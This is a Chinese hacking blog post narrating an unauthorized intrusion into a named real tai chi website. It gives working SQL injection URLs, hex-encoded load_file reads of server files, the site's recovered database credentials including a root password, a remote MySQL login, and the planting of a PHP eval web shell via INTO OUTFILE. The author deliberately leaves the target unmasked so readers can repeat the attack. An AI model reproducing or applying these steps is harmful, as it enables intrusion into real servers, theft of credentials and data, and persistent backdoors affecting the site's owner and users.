记新手的一次渗透入侵

一年前把,渗透了,这次发现不是root,但帐户支持load_file()
Ps:我严重鄙视挂马的人,还有那些黑心贩子。。。
Ps:我从一开始写文章到现在,不屏蔽渗透的地址连接,主要的原因还是希望
大家可以通过我的文章,真正实践性滴学习本文内容,新人朋友可以一步步滴实践操作
【懒得扯淡了,希望大家那个什么什么什么,你们懂的,人品很重要】
http://www.czxtaiji.net/content. ... leId=48%20and%201=2
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 947
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 948
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 949
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 950
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 951
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 952
Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 12 in d:\czxsite\bin\sys\config.php on line 953
获取到路径:d:\czxsite\bin\sys\config.php
clip_image002
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=48 order by 9
clip_image004
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,5,6,7,8,9
Warning: disparticlecontent(7): failed to open stream: No such file or directory in d:\czxsite\bin\sys\config.php on line 976
Warning: disparticlecontent(): Failed opening '7' for inclusion (include_path='.;c:\php4\pear') in d:\czxsite\bin\sys\config.php on line 976
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,user(),database(),7,8,version()
user():czxtaiji@localhost
version():4.0.18-nt  
database():czxtaiji
clip_image006


之前我日过是root权限,支持load_file(),可以读文件
现在不知道还支持不
在 数字5的位置输入:load_file(c:\boot.ini)
c:\boot.ini 需要经过16进制编码转换,
因为本函数无法处理直接写的路径,只能能使用16进制或者是 Ascii 编码.
所以要将路径转换成 16进制或者是Ascii 编码才可以执行
我们可以打开海洋顶端网PHP注射工具,编码转换-To Hex
c:\boot.ini 转换后得到结果:0x633A5C626F6F742E696E69
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,load_file(0x633A5C626F6F742E696E69),6,7,8,9
页面数字5的位置显示(显示如下说明可以读文件):
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)part
clip_image008
我们继续将路径:d:\czxsite\bin\sys\config.php 经过编码转换
d:\czxsite\bin\sys\config.php 转换后结果:0x643A5C637A78736974655C62696E5C7379735C636F6E6669672E706870
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,load_file(0x643A5C637A78736974655C62696E5C7379735C636F6E6669672E706870),6,7,8,9
页面5位置没有显示任何东西
clip_image010
查看网页源代码发现了如下内容:
  //==== 系统环境变数定义档 ====//
  $def_system_name = "陈振肖太极网";
  $def_version  = "1.0.0";
  $def_Update  = "2</font></b></td></tr>
<tr>
<td align="center">来源:9 &nbsp;作者:6 &nbsp;点击:4 &nbsp;上传时间:2000-00-03</td></tr>
clip_image012
以读到,但是有长度限制
一个个爆表爆字段,然后找然后,传php马也可以
但万一找不到后台,密码又解不出,那也没用
我们可以利用  substring 函数
Substring(str,pos,len)函数解决问题.
他的意思是从字符串str的pos位位置起返回len个字符的子串.譬如Substring(load_file(A),50,100)
就是把A的内容的第50个字母开始回显100个给你.那么就能逐段逐段的回显啦.
如:substring(load_file(0x643A5C736974655C62696E5C7379735C636F6E6669672E706870),150,50)
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,substring(load_file(0x643A5C637A78736974655C62696E5C7379735C636F6E6669672E706870),150,50),6,7,8,9/*
读取到如下内容:
yName = "WebAdmin"; $def_myURL = "http://www.
中间省略N猜解读取过程。。。。。。。。。。。。。
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,substring(load_file(0x643A5C637A78736974655C62696E5C7379735C636F6E6669672E706870),150,100),6,7,8,9/*
读取到如下内容:
zxtaiji"; // 资料库帐号 $def_db_passwd = "czxtaiji"; // 管理密码 $def_select_db = "czxtaiji"; // 测试用 - 留言版资料?
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,substring(load_file(0x643A5C637A78736974655C62696E5C7379735C636F6E6669672E706870),730,300),6,7,8,9/*
读取到如下内容:
def_db_local = "localhost"; // 资料库连结位址 $def_db_admin = "czxtaiji"; // 资料库帐号 $def_db_passwd = "czxtaiji";
http://www.czxtaiji.net/content.php
?theMenuId=4
&theSubMenuId=1
&theArticleId=-48 union select 1,2,3,4,substring(load_file(0x643A5C637A78736974655C62696E5C7379735C636F6E6669672E706870),780,300),6,7,8,9/*
读取到如下内容:
$def_db_admin = "czxtaiji"; // 资料库帐号 $def_db_passwd = "czxtaiji"; // 管理密码 $def_select_db = "czxtaiji"; //
$def_db_admin = "czxtaiji";
$def_db_passwd = "czxtaiji"
$def_select_db = "czxtaiji"
赶紧链接啊
D:\PHPnow-1.5.6\MySQL-5.0.90\bin>mysql -hwww.czxtaiji.net -uczxtaiji -p czxtaiji
Enter password: ********
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 55889
Server version: 4.0.18-nt
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
clip_image014
mysql> select version();
+-----------+
| version() |
+-----------+
| 4.0.18-nt |
+-----------+
1 row in set (0.02 sec)
mysql> show databases;
+------------+
| Database   |
+------------+
| chat       |
| czx_discuz |
| czx_uc     |
| czxtaiji   |
| mydb       |
| mysql      |
| taiji      |
| 复件 taiji |
+------------+
8 rows in set (0.05 sec)
clip_image015
赶紧往数据库里写马啊
create table gongji(str TEXT);  
insert into gongji values("<?php eval($_POST[cmd])?>");  
select * from gongji into outfile 'd:/czxsite/bin/gongji.php';
Dos窗口下内容如下:
mysql> create table gongji(str TEXT);
Query OK, 0 rows affected (0.64 sec)
mysql> insert into gongji values("<?php eval($_POST[cmd])?>");
Query OK, 1 row affected (0.08 sec)
mysql> select * from gongji into outfile 'd:/czxsite/bin/gongji.php';
Query OK, 1 row affected (0.08 sec)
clip_image017
一句话木马链接操之:
Notice: Use of undefined constant cmd - assumed 'cmd' in d:\czxsite\bin\gongji.php on line 1
Notice: Use of undefined constant 服务器系统 - assumed '服务器系统' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
服务器系统:WINNT
Notice: Use of undefined constant 服务器操作系统文字编码 - assumed '服务器操作系统文字编码' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
服务器操作系统文字编码:
Notice: Use of undefined constant HTTP_ACCEPT_LANGUAGE - assumed 'HTTP_ACCEPT_LANGUAGE' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
zh-cn
Notice: Use of undefined constant 服务器IP - assumed '服务器IP' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
服务器IP:
Notice: Use of undefined constant SERVER_NAME - assumed 'SERVER_NAME' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
localhost
Notice: Use of undefined constant Web服务端口端口 - assumed 'Web服务端口端口' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
Web服务端口端口:
Notice: Use of undefined constant SERVER_PORT - assumed 'SERVER_PORT' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
80
Notice: Use of undefined constant PHP运行方式 - assumed 'PHP运行方式' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
PHP运行方式:APACHE
Notice: Use of undefined constant PHP版本 - assumed 'PHP版本' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
PHP版本:4.3.4
Notice: Use of undefined constant 本文件路径 - assumed '本文件路径' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
本文件路径:
Notice: Use of undefined constant PATH_TRANSLATED - assumed 'PATH_TRANSLATED' in d:\czxsite\bin\gongji.php(1) : eval()'d code on line 1
d:/czxsite/bin/gongji.php
clip_image019clip_image021clip_image023
好吧,上大马链接吧
好,进去看看完整的config.php文件吧
<?php
  //==== 系统环境变数定义档 ====//
  $def_system_name = "陈振肖太极网";
  $def_version  = "1.0.0";
  $def_Update  = "2005/01/01";
  $def_myName  = "WebAdmin";
  $def_myURL  = "http://www.czxtaiji.net/";
  //$def_myURL  = "http://Localhost/";
  $def_myStreamURL = "rtsp://www.czxtaiji.net:554/taiji/";
   //$def_myStreamURL  = "rtsp://Localhost:554/taiji/";
  $def_myURL_Title = "陈振肖太极网";
  $def_myEmail  = "[email protected]";
  //系统目录配置
  $def_article_dir = $def_myURL . "Article/" ;
  $def_page_top = $def_myURL . "pages/page_top.htm" ;
  $def_page_foot = $def_myURL . "pages/page_foot_1.htm" ;
  $def_page_main = $def_myURL . "pages/page_main.htm" ;
  //==== 资料库义档 ====//
  $def_db_local  = "localhost";  // 资料库连结位址
  $def_db_admin  = "czxtaiji";   // 资料库帐号
  $def_db_passwd = "czxtaiji";   // 管理密码
  $def_select_db = "czxtaiji";  // 测试用 - 留言版资料库
  $def_URL  = "http://localhost/"; // 系统位址
  $def_user_table = "user_list";  // 线上使用者资料资料表名称
  $def_log_table = "user_log";  // 使用者纪录档
  $def_msg_table = "msg";  // 讯息资料表名称
clip_image025
打开d:/czxsite/bbs/config.inc.php,有获取如下信息:
$dbhost = 'localhost';   // 数据库服务器
$dbuser = 'root';   // 数据库用户名
$dbpw = 'wenminyjh';    // 数据库密码
$dbname = 'czx_discuz';   // 数据库名
$pconnect = 0;    // 数据库持久连接 0=关闭, 1=打开
clip_image027clip_image029

 

clip_image031

源链接

Hacking more

...